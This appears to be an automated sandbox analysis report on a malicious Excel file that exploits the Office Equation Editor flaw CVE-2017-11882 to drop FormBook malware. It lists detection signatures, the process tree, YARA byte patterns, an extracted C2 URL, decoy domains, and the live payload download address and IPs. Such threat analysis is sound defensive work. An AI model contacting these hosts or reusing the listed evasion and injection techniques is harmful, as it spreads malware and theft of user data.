Play interactive tour

Edit tour

Windows Analysis Report Sajeeb09908976745344567.xlsx

Overview

General Information

Sample Name:	Sajeeb09908976745344567.xlsx
Analysis ID:	502271
MD5:	ac493c2681477e3b56acbb570b8e41d9
SHA1:	2d9019b6c2f57c6360b155957cb542ae61bbf728
SHA256:	9efaa722d6e9df7c6628df6d1f49d14d858b60782db11c3f1e9b5037803b290b
Tags:	FormbookVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Uses netsh to modify the Windows network and firewall settings

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Potential document exploit detected (unknown TCP traffic)

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Drops PE files to the user directory

Dropped file seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 284 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2540 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 1292 cmdline: 'C:\Users\Public\vbc.exe' MD5: 0031A23B4BB6ABCDCCC5F8122DE5FCB5)

vbc.exe (PID: 2072 cmdline: 'C:\Users\Public\vbc.exe' MD5: 0031A23B4BB6ABCDCCC5F8122DE5FCB5)

explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

netsh.exe (PID: 1864 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: 784A50A6A09C25F011C3143DDD68E729)

cmd.exe (PID: 2544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.naplesconciergerealty.com/mxnu/"], "decoy": ["insightmyhome.com", "gabriellamaxey.com", "029atk.xyz", "marshconstructions.com", "technichoffghosts.com", "blue-ivy-boutique-au.com", "1sunsetgroup.com", "elfkuhnispb.store", "caoliudh.club", "verifiedpaypal.net", "jellyice-tr.com", "gatescres.com", "bloomberq.online", "crystaltopagent.net", "uggs-line.com", "ecommerceplatform.xyz", "historyofcambridge.com", "sattaking-gaziabad.xyz", "digisor.com", "beachpawsmobilegrooming.com", "whitebot.xyz", "zacky6.online", "qlfa8gzk8f.com", "scottjasonfowler.com", "influxair.com", "desongli.com", "xn--w7uy63f0ne2sj.com", "pinup722bk.com", "haohuatour.com", "dharmathinkural.com", "hanjyu.com", "tbrhc.com", "clarityflux.com", "meltonandcompany.com", "revgeek.com", "onehigh.club", "closetu.com", "yama-nkok.com", "brandonhistoryandinfo.com", "funkidsroomdecor.com", "epilasyonmerkeziankara.com", "265411.com", "watch12.online", "dealsbonaza.com", "gold2guide.art", "tomclark.online", "877961.com", "washingtonboatrentals.com", "promovart.com", "megapollice.online", "taquerialoteria.com", "foxsontreeservice.com", "safebookkeeping.com", "theeducationwheel.online", "sasanos.com", "procurovariedades.com", "normandia.pro", "ingdalynnia.xyz", "campusguideconsulting.com", "ashramseries.com", "clubcupids.art", "mortgagerates.solutions", "deepscanlabs.com", "insulated-box.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6aa9:$sqlite3step: 68 34 1C 7B E1 0x6bbc:$sqlite3step: 68 34 1C 7B E1 0x6ad8:$sqlite3text: 68 38 2A 90 C5 0x6bfd:$sqlite3text: 68 38 2A 90 C5 0x6aeb:$sqlite3blob: 68 53 D8 7F 8C 0x6c13:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6aa9:$sqlite3step: 68 34 1C 7B E1 0x6bbc:$sqlite3step: 68 34 1C 7B E1 0x6ad8:$sqlite3text: 68 38 2A 90 C5 0x6bfd:$sqlite3text: 68 38 2A 90 C5 0x6aeb:$sqlite3blob: 68 53 D8 7F 8C 0x6c13:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 25 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 192.3.110.172, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2540, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2540, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2540, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1292

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.naplesconciergerealty.com/mxnu/"], "decoy": ["insightmyhome.com", "gabriellamaxey.com", "029atk.xyz", "marshconstructions.com", "technichoffghosts.com", "blue-ivy-boutique-au.com", "1sunsetgroup.com", "elfkuhnispb.store", "caoliudh.club", "verifiedpaypal.net", "jellyice-tr.com", "gatescres.com", "bloomberq.online", "crystaltopagent.net", "uggs-line.com", "ecommerceplatform.xyz", "historyofcambridge.com", "sattaking-gaziabad.xyz", "digisor.com", "beachpawsmobilegrooming.com", "whitebot.xyz", "zacky6.online", "qlfa8gzk8f.com", "scottjasonfowler.com", "influxair.com", "desongli.com", "xn--w7uy63f0ne2sj.com", "pinup722bk.com", "haohuatour.com", "dharmathinkural.com", "hanjyu.com", "tbrhc.com", "clarityflux.com", "meltonandcompany.com", "revgeek.com", "onehigh.club", "closetu.com", "yama-nkok.com", "brandonhistoryandinfo.com", "funkidsroomdecor.com", "epilasyonmerkeziankara.com", "265411.com", "watch12.online", "dealsbonaza.com", "gold2guide.art", "tomclark.online", "877961.com", "washingtonboatrentals.com", "promovart.com", "megapollice.online", "taquerialoteria.com", "foxsontreeservice.com", "safebookkeeping.com", "theeducationwheel.online", "sasanos.com", "procurovariedades.com", "normandia.pro", "ingdalynnia.xyz", "campusguideconsulting.com", "ashramseries.com", "clubcupids.art", "mortgagerates.solutions", "deepscanlabs.com", "insulated-box.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Sajeeb09908976745344567.xlsx	Virustotal: Detection: 29%			Perma Link
Source: Sajeeb09908976745344567.xlsx	ReversingLabs: Detection: 21%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: www.naplesconciergerealty.com/mxnu/	Avira URL Cloud: Label: malware
Source: http://192.3.110.172/000900/vbc.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: www.naplesconciergerealty.com/mxnu/

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 36%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Source: 5.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.netsh.exe.6d3da0.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.vbc.exe.3030000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.netsh.exe.2c6796c.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.1.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.556406324.0000000000553000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402671 FindFirstFileA,

Source: global traffic

DNS query: name: www.washingtonboatrentals.com

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.3.110.172:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.3.110.172:80

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe	Domain query: www.washingtonboatrentals.com

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.naplesconciergerealty.com/mxnu/

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

IP Address: 3.64.163.50 3.64.163.50

Source: global traffic

